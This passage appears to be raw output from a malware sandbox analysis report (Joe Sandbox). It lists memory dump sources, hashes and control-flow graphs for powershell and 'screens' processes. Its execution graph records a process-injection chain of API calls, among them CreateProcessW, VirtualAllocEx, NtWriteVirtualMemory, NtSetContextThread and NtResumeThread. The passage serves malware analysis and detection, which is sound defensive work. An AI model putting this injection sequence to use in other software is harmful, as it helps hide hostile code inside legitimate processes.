                                                            • Instruction Fuzzy Hash: E1C11322D0DAC64FE396AB3818195B5BFA0EF5A220B5C05FED049C72D3DE18790683A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1545266303.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0310000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: J_L;
                                                            • API String ID: 0-1607133157
                                                            • Opcode ID: 636ed7e7df0b335283048d8c5b82eb31db854163150cc038060c370cca0e34d9
                                                            • Instruction ID: fa64e96ce1014a6f10d0098e8311583d9de9c6b3c47f8691e2336ff2758f5fe7
                                                            • Opcode Fuzzy Hash: 636ed7e7df0b335283048d8c5b82eb31db854163150cc038060c370cca0e34d9
                                                            • Instruction Fuzzy Hash: FB312632F1EA874FE799ABA804551B8B6C5EF49274B8401BDC45EC32D2DF18B84583A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1545266303.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0310000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8e7ffac07ad14a5087393babf6d0c3e9411b33b508ee84251eedbde235bfc0b
                                                            • Instruction ID: 7c7ac89dd4463d6fd968e1f79093a5394f18b08671899944e89c2935f2f83a8f
                                                            • Opcode Fuzzy Hash: a8e7ffac07ad14a5087393babf6d0c3e9411b33b508ee84251eedbde235bfc0b
                                                            • Instruction Fuzzy Hash: 66D10631A0DAC94FE796EF2898555B9BBA0EF0A360B4805FED04DCB1D3DF14A805C3A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1544762520.00007FF7C0240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0240000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction ID: b59cfae338d122b582f3448533001b7876ddd0559532c6f5f6b6dbf3c5e56f9d
                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction Fuzzy Hash: 5201677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3651DB36E882CB45

                                                            Execution Graph

                                                            Execution Coverage:13.3%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:18.4%
                                                            Total number of Nodes:321
                                                            Total number of Limit Nodes:13
                                                            execution_graph 16227 2d517d0 16228 2d5181d VirtualProtect 16227->16228 16229 2d51889 16228->16229 16233 abe0828 16234 abe0844 16233->16234 16271 abe088a 16234->16271 16281 abecbae 16234->16281 16289 abec45f 16234->16289 16297 abec92f 16234->16297 16302 abec71c 16234->16302 16313 abec00d 16234->16313 16321 abec99d 16234->16321 16326 abeca95 16234->16326 16331 abec9f2 16234->16331 16336 abec363 16234->16336 16341 abee08f 16234->16341 16349 abee30f 16234->16349 16357 abeec8c 16234->16357 16365 abee14d 16234->16365 16373 abee188 16234->16373 16381 abee511 16234->16381 16387 abee7c5 16234->16387 16392 abee465 16234->16392 16397 abee8c1 16234->16397 16402 abeeb21 16234->16402 16407 abeed5f 16234->16407 16412 abeec9c 16234->16412 16420 abeee1b 16234->16420 16425 abee1d4 16234->16425 16430 abeea54 16234->16430 16435 abee435 16234->16435 16235 abe0a5b 16441 aea0608 16271->16441 16446 aea0e24 16271->16446 16451 aea083b 16271->16451 16456 aea00fd 16271->16456 16463 aea104d 16271->16463 16469 aea0f08 16271->16469 16477 aea0dd0 16271->16477 16482 aea06b7 16271->16482 16487 aea0025 16271->16487 16494 aea0712 16271->16494 16499 aea0b7d 16271->16499 16504 aea065d 16271->16504 16509 aea0040 16271->16509 16516 aea0012 16271->16516 16523 aea077c 16271->16523 16528 aea0274 16271->16528 16533 aea0955 16271->16533 16538 aea053f 16271->16538 16543 aea03e2 16271->16543 16282 abecbba 16281->16282 16548 abed3a0 16282->16548 16553 abed391 16282->16553 16283 abecc11 16558 abeddc9 16283->16558 16562 abeddd0 16283->16562 16284 abecc4d 16290 abec46b 16289->16290 16293 abed3a0 2 API calls 16290->16293 16294 abed391 2 API calls 16290->16294 16291 abec4b8 16574 abedca8 16291->16574 16578 abedcb0 16291->16578 16292 abec4f6 16293->16291 16294->16291 16298 abec93b 16297->16298 16582 abedba8 16298->16582 16586 abedbb0 16298->16586 16299 abec979 16303 abec731 16302->16303 16307 abed3a0 2 API calls 16303->16307 16308 abed391 2 API calls 16303->16308 16304 abec74d 16311 abed3a0 2 API calls 16304->16311 16312 abed391 2 API calls 16304->16312 16305 abec791 16309 abedba8 NtResumeThread 16305->16309 16310 abedbb0 NtResumeThread 16305->16310 16306 abec84d 16307->16304 16308->16304 16309->16306 16310->16306 16311->16305 16312->16305 16314 abec019 16313->16314 16317 abeddc9 NtWriteVirtualMemory 16314->16317 16318 abeddd0 NtWriteVirtualMemory 16314->16318 16315 abec0b2 16319 abed3a0 2 API calls 16315->16319 16320 abed391 2 API calls 16315->16320 16316 abec100 16316->16234 16317->16315 16318->16315 16319->16316 16320->16316 16322 abec9a9 16321->16322 16590 abedf28 16322->16590 16594 abedf21 16322->16594 16323 abec9ce 16327 abecab0 16326->16327 16329 abedf28 NtSetContextThread 16327->16329 16330 abedf21 NtSetContextThread 16327->16330 16328 abecb28 16329->16328 16330->16328 16332 abec9fe 16331->16332 16334 abeddc9 NtWriteVirtualMemory 16332->16334 16335 abeddd0 NtWriteVirtualMemory 16332->16335 16333 abeca71 16334->16333 16335->16333 16337 abec36d 16336->16337 16339 abed3a0 2 API calls 16337->16339 16340 abed391 2 API calls 16337->16340 16338 abec3bb 16339->16338 16340->16338 16342 abee0c4 16341->16342 16347 abedf28 NtSetContextThread 16342->16347 16348 abedf21 NtSetContextThread 16342->16348 16343 abef01c 16345 abedba8 NtResumeThread 16343->16345 16346 abedbb0 NtResumeThread 16343->16346 16344 abef0cf 16344->16234 16345->16344 16346->16344 16347->16343 16348->16343 16350 abee32a 16349->16350 16598 abef288 16350->16598 16603 abef279 16350->16603 16351 abee3ca 16355 abedca8 VirtualAllocEx 16351->16355 16356 abedcb0 VirtualAllocEx 16351->16356 16352 abee408 16355->16352 16356->16352 16358 abeec8f 16357->16358 16361 abef288 2 API calls 16358->16361 16362 abef279 2 API calls 16358->16362 16359 abeecff 16363 abeddc9 NtWriteVirtualMemory 16359->16363 16364 abeddd0 NtWriteVirtualMemory 16359->16364 16360 abeed3b 16361->16359 16362->16359 16363->16360 16364->16360 16366 abee119 16365->16366 16371 abedf28 NtSetContextThread 16366->16371 16372 abedf21 NtSetContextThread 16366->16372 16367 abef01c 16369 abedba8 NtResumeThread 16367->16369 16370 abedbb0 NtResumeThread 16367->16370 16368 abef0cf 16368->16234 16369->16368 16370->16368 16371->16367 16372->16367 16374 abee119 16373->16374 16377 abedf28 NtSetContextThread 16374->16377 16378 abedf21 NtSetContextThread 16374->16378 16375 abef01c 16379 abedba8 NtResumeThread 16375->16379 16380 abedbb0 NtResumeThread 16375->16380 16376 abef0cf 16376->16234 16377->16375 16378->16375 16379->16376 16380->16376 16382 abee518 16381->16382 16383 abee4b4 16381->16383 16385 abeddc9 NtWriteVirtualMemory 16383->16385 16386 abeddd0 NtWriteVirtualMemory 16383->16386 16384 abee4e4 16385->16384 16386->16384 16388 abee7cf 16387->16388 16390 abef288 2 API calls 16388->16390 16391 abef279 2 API calls 16388->16391 16389 abee81d 16390->16389 16391->16389 16393 abee471 16392->16393 16395 abeddc9 NtWriteVirtualMemory 16393->16395 16396 abeddd0 NtWriteVirtualMemory 16393->16396 16394 abee4e4 16395->16394 16396->16394 16398 abee8dc 16397->16398 16400 abedba8 NtResumeThread 16398->16400 16401 abedbb0 NtResumeThread 16398->16401 16399 abee96e 16400->16399 16401->16399 16403 abeeb4c 16402->16403 16405 abef288 2 API calls 16403->16405 16406 abef279 2 API calls 16403->16406 16404 abeeb68 16405->16404 16406->16404 16408 abeed6b 16407->16408 16410 abef288 2 API calls 16408->16410 16411 abef279 2 API calls 16408->16411 16409 abeed87 16410->16409 16411->16409 16413 abeeca8 16412->16413 16416 abef288 2 API calls 16413->16416 16417 abef279 2 API calls 16413->16417 16414 abeecff 16418 abeddc9 NtWriteVirtualMemory 16414->16418 16419 abeddd0 NtWriteVirtualMemory 16414->16419 16415 abeed3b 16416->16414 16417->16414 16418->16415 16419->16415 16421 abeee27 16420->16421 16423 abedf28 NtSetContextThread 16421->16423 16424 abedf21 NtSetContextThread 16421->16424 16422 abeee4c 16423->16422 16424->16422 16426 abee1de 16425->16426 16428 abef288 2 API calls 16426->16428 16429 abef279 2 API calls 16426->16429 16427 abee257 16428->16427 16429->16427 16431 abeeaa7 16430->16431 16433 abeddc9 NtWriteVirtualMemory 16431->16433 16434 abeddd0 NtWriteVirtualMemory 16431->16434 16432 abeeafd 16433->16432 16434->16432 16436 abee43a 16435->16436 16437 abee3f4 16435->16437 16439 abedca8 VirtualAllocEx 16437->16439 16440 abedcb0 VirtualAllocEx 16437->16440 16438 abee408 16439->16438 16440->16438 16442 aea0614 16441->16442 16444 abedf28 NtSetContextThread 16442->16444 16445 abedf21 NtSetContextThread 16442->16445 16443 aea0639 16444->16443 16445->16443 16447 aea0e2e 16446->16447 16608 abecd1c 16447->16608 16612 abecdc0 16447->16612 16452 aea0856 16451->16452 16454 abedba8 NtResumeThread 16452->16454 16455 abedbb0 NtResumeThread 16452->16455 16453 aea08e7 16454->16453 16455->16453 16457 aea00c9 16456->16457 16457->16456 16458 aea00f7 16457->16458 16461 abedca8 VirtualAllocEx 16457->16461 16462 abedcb0 VirtualAllocEx 16457->16462 16616 aea1240 16457->16616 16621 aea1231 16457->16621 16458->16235 16461->16457 16462->16457 16464 aea0ff0 16463->16464 16465 aea105e 16464->16465 16467 abeddc9 NtWriteVirtualMemory 16464->16467 16468 abeddd0 NtWriteVirtualMemory 16464->16468 16466 aea100c 16467->16466 16468->16466 16470 aea0f23 16469->16470 16473 aea1240 2 API calls 16470->16473 16474 aea1231 2 API calls 16470->16474 16471 aea0fd0 16475 abeddc9 NtWriteVirtualMemory 16471->16475 16476 abeddd0 NtWriteVirtualMemory 16471->16476 16472 aea100c 16473->16471 16474->16471 16475->16472 16476->16472 16479 aea0dd4 16477->16479 16478 aea0e6f 16479->16478 16480 abecd1c CreateProcessW 16479->16480 16481 abecdc0 CreateProcessW 16479->16481 16480->16478 16481->16478 16483 aea06bc 16482->16483 16484 aea0676 16482->16484 16484->16482 16485 aea1240 2 API calls 16484->16485 16486 aea1231 2 API calls 16484->16486 16485->16484 16486->16484 16489 aea000a 16487->16489 16488 aea00f7 16488->16235 16489->16487 16489->16488 16490 aea1240 2 API calls 16489->16490 16491 aea1231 2 API calls 16489->16491 16492 abedca8 VirtualAllocEx 16489->16492 16493 abedcb0 VirtualAllocEx 16489->16493 16490->16489 16491->16489 16492->16489 16493->16489 16495 aea0727 16494->16495 16497 aea1240 2 API calls 16495->16497 16498 aea1231 2 API calls 16495->16498 16496 aea0743 16497->16496 16498->16496 16500 aea0b99 16499->16500 16502 abeddc9 NtWriteVirtualMemory 16500->16502 16503 abeddd0 NtWriteVirtualMemory 16500->16503 16501 aea0c21 16502->16501 16503->16501 16505 aea0669 16504->16505 16506 aea06bc 16505->16506 16507 aea1240 2 API calls 16505->16507 16508 aea1231 2 API calls 16505->16508 16507->16505 16508->16505 16510 aea0074 16509->16510 16511 aea00f7 16510->16511 16512 aea1240 2 API calls 16510->16512 16513 aea1231 2 API calls 16510->16513 16514 abedca8 VirtualAllocEx 16510->16514 16515 abedcb0 VirtualAllocEx 16510->16515 16511->16235 16512->16510 16513->16510 16514->16510 16515->16510 16517 aea000a 16516->16517 16517->16516 16518 aea00f7 16517->16518 16519 aea1240 2 API calls 16517->16519 16520 aea1231 2 API calls 16517->16520 16521 abedca8 VirtualAllocEx 16517->16521 16522 abedcb0 VirtualAllocEx 16517->16522 16518->16235 16519->16517 16520->16517 16521->16517 16522->16517 16524 aea0788 16523->16524 16526 abedf28 NtSetContextThread 16524->16526 16527 abedf21 NtSetContextThread 16524->16527 16525 aea07ad 16526->16525 16527->16525 16529 aea027e 16528->16529 16531 aea1240 2 API calls 16529->16531 16532 aea1231 2 API calls 16529->16532 16530 aea02cc 16531->16530 16532->16530 16534 aea09a7 16533->16534 16536 abeddc9 NtWriteVirtualMemory 16534->16536 16537 abeddd0 NtWriteVirtualMemory 16534->16537 16535 aea09fd 16536->16535 16537->16535 16539 aea054b 16538->16539 16541 abedba8 NtResumeThread 16539->16541 16542 abedbb0 NtResumeThread 16539->16542 16540 aea058a 16541->16540 16542->16540 16544 aea040d 16543->16544 16546 aea1240 2 API calls 16544->16546 16547 aea1231 2 API calls 16544->16547 16545 aea0429 16546->16545 16547->16545 16549 abed3c4 16548->16549 16566 abed9f8 16549->16566 16570 abed9f0 16549->16570 16550 abed4a2 16550->16283 16554 abed3c4 16553->16554 16556 abed9f8 NtReadVirtualMemory 16554->16556 16557 abed9f0 NtReadVirtualMemory 16554->16557 16555 abed4a2 16555->16283 16556->16555 16557->16555 16559 abede19 NtWriteVirtualMemory 16558->16559 16561 abedeb2 16559->16561 16561->16284 16563 abede19 NtWriteVirtualMemory 16562->16563 16565 abedeb2 16563->16565 16565->16284 16567 abeda44 NtReadVirtualMemory 16566->16567 16569 abedabc 16567->16569 16569->16550 16571 abeda44 NtReadVirtualMemory 16570->16571 16573 abedabc 16571->16573 16573->16550 16575 abedcf4 VirtualAllocEx 16574->16575 16577 abedd6c 16575->16577 16577->16292 16579 abedcf4 VirtualAllocEx 16578->16579 16581 abedd6c 16579->16581 16581->16292 16583 abedbf4 NtResumeThread 16582->16583 16585 abedc4b 16583->16585 16585->16299 16587 abedbf4 NtResumeThread 16586->16587 16589 abedc4b 16587->16589 16589->16299 16591 abedf71 NtSetContextThread 16590->16591 16593 abedfe9 16591->16593 16593->16323 16595 abedf71 NtSetContextThread 16594->16595 16597 abedfe9 16595->16597 16597->16323 16600 abef2ac 16598->16600 16599 abef2f2 16599->16351 16600->16599 16601 abed9f8 NtReadVirtualMemory 16600->16601 16602 abed9f0 NtReadVirtualMemory 16600->16602 16601->16600 16602->16600 16605 abef2ac 16603->16605 16604 abef2f2 16604->16351 16605->16604 16606 abed9f8 NtReadVirtualMemory 16605->16606 16607 abed9f0 NtReadVirtualMemory 16605->16607 16606->16605 16607->16605 16609 abece50 CreateProcessW 16608->16609 16611 abed224 16609->16611 16613 abece50 CreateProcessW 16612->16613 16615 abed224 16613->16615 16618 aea1264 16616->16618 16617 aea12aa 16617->16457 16618->16617 16619 abed9f8 NtReadVirtualMemory 16618->16619 16620 abed9f0 NtReadVirtualMemory 16618->16620 16619->16618 16620->16618 16623 aea1264 16621->16623 16622 aea12aa 16622->16457 16623->16622 16624 abed9f8 NtReadVirtualMemory 16623->16624 16625 abed9f0 NtReadVirtualMemory 16623->16625 16624->16623 16625->16623

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 2d546c0-2d546e5 1 2d546e7 0->1 2 2d546ec-2d54709 0->2 1->2 3 2d54711 2->3 4 2d54718-2d54734 3->4 5 2d54736 4->5 6 2d5473d-2d5473e 4->6 5->3 5->6 7 2d548d4-2d548e1 5->7 8 2d54916-2d54936 5->8 9 2d54813-2d54825 5->9 10 2d54ad3-2d54aea 5->10 11 2d54a5d-2d54a69 5->11 12 2d547dc-2d547e8 5->12 13 2d54885-2d54891 5->13 14 2d54a87-2d54a90 5->14 15 2d54846-2d5484c 5->15 16 2d549c1-2d549c5 5->16 17 2d54743-2d5474f 5->17 18 2d54a0b-2d54a1d 5->18 19 2d54774-2d54780 5->19 20 2d549f1-2d54a06 5->20 21 2d54abc-2d54ace 5->21 22 2d5493b-2d5493f 5->22 23 2d548e6-2d548ea 5->23 24 2d54a22-2d54a3b call 2d54d08 5->24 25 2d54aef-2d54b02 5->25 26 2d548af-2d548cf 5->26 27 2d547a8-2d547b4 5->27 28 2d5486b-2d54880 5->28 29 2d5496b-2d54983 5->29 30 2d5482a-2d54841 5->30 6->25 7->4 8->4 9->4 10->4 49 2d54a70-2d54a82 11->49 50 2d54a6b 11->50 37 2d547ef-2d5480e 12->37 38 2d547ea 12->38 41 2d54893 13->41 42 2d54898-2d548aa 13->42 33 2d54aa3-2d54aaa 14->33 34 2d54a92-2d54aa1 14->34 55 2d54854-2d54866 15->55 43 2d549c7-2d549d6 16->43 44 2d549d8-2d549df 16->44 45 2d54756-2d54772 17->45 46 2d54751 17->46 18->4 47 2d54787-2d547a3 19->47 48 2d54782 19->48 20->4 21->4 35 2d54941-2d54950 22->35 36 2d54952-2d54959 22->36 51 2d548fd-2d54904 23->51 52 2d548ec-2d548fb 23->52 61 2d54a41-2d54a58 24->61 26->4 31 2d547b6 27->31 32 2d547bb-2d547d7 27->32 28->4 39 2d54985 29->39 40 2d5498a-2d549a0 29->40 30->4 31->32 32->4 53 2d54ab1-2d54ab7 33->53 34->53 59 2d54960-2d54966 35->59 36->59 37->4 38->37 39->40 69 2d549a7-2d549bc 40->69 70 2d549a2 40->70 41->42 42->4 60 2d549e6-2d549ec 43->60 44->60 45->4 46->45 47->4 48->47 49->4 50->49 57 2d5490b-2d54911 51->57 52->57 53->4 55->4 57->4 59->4 60->4 61->4 69->4 70->69
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: >,9$$>,9$$D|zJ$D|zJ$i4t:
                                                            • API String ID: 0-3823586563
                                                            • Opcode ID: 35e4bc374531ed79ccea1ac581e84cdffca20e3c5b7c016784881ce4eea4c0f9
                                                            • Instruction ID: f699f1b972c67f863b8b8960be0d0ad028a11650cc1b7918e4b399eeaba6f31e
                                                            • Opcode Fuzzy Hash: 35e4bc374531ed79ccea1ac581e84cdffca20e3c5b7c016784881ce4eea4c0f9
                                                            • Instruction Fuzzy Hash: D4D11574E0421ADFCB04CFA5D4849AEFBB2FF8A300B519559D816AB314D734EA82CF95

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 211 d0692ba-d0692d9 212 d0692a7-d0692b8 211->212 213 d0692db-d069305 211->213 212->211 214 d069307 213->214 215 d06930c-d069329 213->215 214->215 216 d069331-d06934a call d069920 215->216 217 d069350-d069352 216->217 218 d069355 217->218 219 d06935c-d069378 218->219 220 d069381-d069382 219->220 221 d06937a 219->221 225 d069387-d06939e 220->225 239 d06972c-d069733 220->239 221->218 222 d069586-d06959b 221->222 223 d069406-d069424 221->223 224 d069607-d069613 221->224 221->225 226 d069685-d069697 221->226 227 d069500-d069509 221->227 228 d0696c1-d0696d5 221->228 229 d0695d4-d0695e6 221->229 230 d0693dc-d0693e8 221->230 231 d06969c-d0696bc 221->231 232 d0696da-d0696fa 221->232 233 d0694db-d0694fb 221->233 234 d069459-d06946b 221->234 235 d0694a7-d0694b3 221->235 236 d0695a0-d0695ac 221->236 237 d0693a0-d0693ad 221->237 238 d0693af-d0693b3 221->238 221->239 240 d0695eb-d069602 221->240 241 d06966b-d069680 221->241 242 d069429-d06942d 221->242 243 d069535-d069541 221->243 244 d069470-d06947c 221->244 245 d0696ff-d06970b 221->245 246 d06963b-d06963f 221->246 222->219 223->219 267 d069615 224->267 268 d06961a-d069636 224->268 225->219 226->219 261 d06951c-d069523 227->261 262 d06950b-d06951a 227->262 228->219 229->219 251 d0693ef 230->251 252 d0693ea 230->252 231->219 232->219 233->219 234->219 259 d0694b5 235->259 260 d0694ba-d0694d6 235->260 265 d0695b3-d0695cf 236->265 266 d0695ae 236->266 237->219 249 d0693c6-d0693cd 238->249 250 d0693b5-d0693c4 238->250 240->219 241->219 255 d069440-d069447 242->255 256 d06942f-d06943e 242->256 263 d069543 243->263 264 d069548-d06955e 243->264 257 d069483-d0694a2 244->257 258 d06947e 244->258 253 d069712-d069727 245->253 254 d06970d 245->254 247 d069652-d069659 246->247 248 d069641-d069650 246->248 269 d069660-d069666 247->269 248->269 271 d0693d4-d0693da 249->271 250->271 278 d0693f9-d069401 251->278 252->251 253->219 254->253 270 d06944e-d069454 255->270 256->270 257->219 258->257 259->260 260->219 275 d06952a-d069530 261->275 262->275 263->264 284 d069565-d069581 264->284 285 d069560 264->285 265->219 266->265 267->268 268->219 269->219 270->219 271->219 275->219 278->219 284->219 285->284
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: i,($qM$G$[v[
                                                            • API String ID: 0-2528883634
                                                            • Opcode ID: c318621bd637c13616aa5d4a50531c9a3c7bcd4c4ea5fa6ae3f207e5dcd24554
                                                            • Instruction ID: 2fa74dfd8b60c1fed9b40a6eaf14e08595a417ddf8043cc6d3b152acd974a370
                                                            • Opcode Fuzzy Hash: c318621bd637c13616aa5d4a50531c9a3c7bcd4c4ea5fa6ae3f207e5dcd24554
                                                            • Instruction Fuzzy Hash: 3ED14B70E1421ADFEB44CF95E4848AEFBB6FF89300B14C55AD41AAB654D334DA42CFA4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 288 d0692e0-d069305 289 d069307 288->289 290 d06930c-d069352 call d069920 288->290 289->290 293 d069355 290->293 294 d06935c-d069378 293->294 295 d069381-d069382 294->295 296 d06937a 294->296 300 d069387-d06939e 295->300 314 d06972c-d069733 295->314 296->293 297 d069586-d06959b 296->297 298 d069406-d069424 296->298 299 d069607-d069613 296->299 296->300 301 d069685-d069697 296->301 302 d069500-d069509 296->302 303 d0696c1-d0696d5 296->303 304 d0695d4-d0695e6 296->304 305 d0693dc-d0693e8 296->305 306 d06969c-d0696bc 296->306 307 d0696da-d0696fa 296->307 308 d0694db-d0694fb 296->308 309 d069459-d06946b 296->309 310 d0694a7-d0694b3 296->310 311 d0695a0-d0695ac 296->311 312 d0693a0-d0693ad 296->312 313 d0693af-d0693b3 296->313 296->314 315 d0695eb-d069602 296->315 316 d06966b-d069680 296->316 317 d069429-d06942d 296->317 318 d069535-d069541 296->318 319 d069470-d06947c 296->319 320 d0696ff-d06970b 296->320 321 d06963b-d06963f 296->321 297->294 298->294 342 d069615 299->342 343 d06961a-d069636 299->343 300->294 301->294 336 d06951c-d069523 302->336 337 d06950b-d06951a 302->337 303->294 304->294 326 d0693ef 305->326 327 d0693ea 305->327 306->294 307->294 308->294 309->294 334 d0694b5 310->334 335 d0694ba-d0694d6 310->335 340 d0695b3-d0695cf 311->340 341 d0695ae 311->341 312->294 324 d0693c6-d0693cd 313->324 325 d0693b5-d0693c4 313->325 315->294 316->294 330 d069440-d069447 317->330 331 d06942f-d06943e 317->331 338 d069543 318->338 339 d069548-d06955e 318->339 332 d069483-d0694a2 319->332 333 d06947e 319->333 328 d069712-d069727 320->328 329 d06970d 320->329 322 d069652-d069659 321->322 323 d069641-d069650 321->323 344 d069660-d069666 322->344 323->344 346 d0693d4-d0693da 324->346 325->346 353 d0693f9-d069401 326->353 327->326 328->294 329->328 345 d06944e-d069454 330->345 331->345 332->294 333->332 334->335 335->294 350 d06952a-d069530 336->350 337->350 338->339 359 d069565-d069581 339->359 360 d069560 339->360 340->294 341->340 342->343 343->294 344->294 345->294 346->294 350->294 353->294 359->294 360->359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: i,($qM$G$[v[
                                                            • API String ID: 0-2528883634
                                                            • Opcode ID: 99d7a7819f3f75a992910f38c28b3ecfdd4fb1b04dd50e6993dd019052853647
                                                            • Instruction ID: f57eaa745d2d1e3722992a7e5bc67060ba9bca169fd557b27a8ecb5474a71244
                                                            • Opcode Fuzzy Hash: 99d7a7819f3f75a992910f38c28b3ecfdd4fb1b04dd50e6993dd019052853647
                                                            • Instruction Fuzzy Hash: 5FD12770E0421ADFDB44CF9AE4848AEFBB6FF89300B14C559D419AB654D734EA42CFA4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 363 2d545c0-2d546e5 368 2d546e7 363->368 369 2d546ec-2d54709 363->369 368->369 370 2d54711 369->370 371 2d54718-2d54734 370->371 372 2d54736 371->372 373 2d5473d-2d5473e 371->373 372->370 372->373 374 2d548d4-2d548e1 372->374 375 2d54916-2d54936 372->375 376 2d54813-2d54825 372->376 377 2d54ad3-2d54aea 372->377 378 2d54a5d-2d54a69 372->378 379 2d547dc-2d547e8 372->379 380 2d54885-2d54891 372->380 381 2d54a87-2d54a90 372->381 382 2d54846-2d5484c 372->382 383 2d549c1-2d549c5 372->383 384 2d54743-2d5474f 372->384 385 2d54a0b-2d54a1d 372->385 386 2d54774-2d54780 372->386 387 2d549f1-2d54a06 372->387 388 2d54abc-2d54ace 372->388 389 2d5493b-2d5493f 372->389 390 2d548e6-2d548ea 372->390 391 2d54a22-2d54a3b call 2d54d08 372->391 392 2d54aef-2d54b02 372->392 393 2d548af-2d548cf 372->393 394 2d547a8-2d547b4 372->394 395 2d5486b-2d54880 372->395 396 2d5496b-2d54983 372->396 397 2d5482a-2d54841 372->397 373->392 374->371 375->371 376->371 377->371 416 2d54a70-2d54a82 378->416 417 2d54a6b 378->417 404 2d547ef-2d5480e 379->404 405 2d547ea 379->405 408 2d54893 380->408 409 2d54898-2d548aa 380->409 400 2d54aa3-2d54aaa 381->400 401 2d54a92-2d54aa1 381->401 422 2d54854-2d54866 382->422 410 2d549c7-2d549d6 383->410 411 2d549d8-2d549df 383->411 412 2d54756-2d54772 384->412 413 2d54751 384->413 385->371 414 2d54787-2d547a3 386->414 415 2d54782 386->415 387->371 388->371 402 2d54941-2d54950 389->402 403 2d54952-2d54959 389->403 418 2d548fd-2d54904 390->418 419 2d548ec-2d548fb 390->419 428 2d54a41-2d54a58 391->428 393->371 398 2d547b6 394->398 399 2d547bb-2d547d7 394->399 395->371 406 2d54985 396->406 407 2d5498a-2d549a0 396->407 397->371 398->399 399->371 420 2d54ab1-2d54ab7 400->420 401->420 426 2d54960-2d54966 402->426 403->426 404->371 405->404 406->407 436 2d549a7-2d549bc 407->436 437 2d549a2 407->437 408->409 409->371 427 2d549e6-2d549ec 410->427 411->427 412->371 413->412 414->371 415->414 416->371 417->416 424 2d5490b-2d54911 418->424 419->424 420->371 422->371 424->371 426->371 427->371 428->371 436->371 437->436
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D|zJ$i4t:
                                                            • API String ID: 0-2751561044
                                                            • Opcode ID: 388e5ab919de4960a89083088ee00ca5f7e5105b51d28b830cab16d5803b948d
                                                            • Instruction ID: 3b50d1a51bb5aba272ea368a4905298ba6697be875a875b4893098ad3c2a19d6
                                                            • Opcode Fuzzy Hash: 388e5ab919de4960a89083088ee00ca5f7e5105b51d28b830cab16d5803b948d
                                                            • Instruction Fuzzy Hash: 75F19BB4D0421ADFCB04CFA5D4855AEFBB2FF8A300B659559D846AB314C374EA82CF91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 440 2d5459f-2d545a0 441 2d545a1-2d545a9 440->441 442 2d5460c-2d546e5 441->442 443 2d545ab-2d545ad 441->443 448 2d546e7 442->448 449 2d546ec-2d54709 442->449 443->441 443->442 448->449 450 2d54711 449->450 451 2d54718-2d54734 450->451 452 2d54736 451->452 453 2d5473d-2d5473e 451->453 452->450 452->453 454 2d548d4-2d548e1 452->454 455 2d54916-2d54936 452->455 456 2d54813-2d54825 452->456 457 2d54ad3-2d54aea 452->457 458 2d54a5d-2d54a69 452->458 459 2d547dc-2d547e8 452->459 460 2d54885-2d54891 452->460 461 2d54a87-2d54a90 452->461 462 2d54846-2d5484c 452->462 463 2d549c1-2d549c5 452->463 464 2d54743-2d5474f 452->464 465 2d54a0b-2d54a1d 452->465 466 2d54774-2d54780 452->466 467 2d549f1-2d54a06 452->467 468 2d54abc-2d54ace 452->468 469 2d5493b-2d5493f 452->469 470 2d548e6-2d548ea 452->470 471 2d54a22-2d54a3b call 2d54d08 452->471 472 2d54aef-2d54b02 452->472 473 2d548af-2d548cf 452->473 474 2d547a8-2d547b4 452->474 475 2d5486b-2d54880 452->475 476 2d5496b-2d54983 452->476 477 2d5482a-2d54841 452->477 453->472 454->451 455->451 456->451 457->451 496 2d54a70-2d54a82 458->496 497 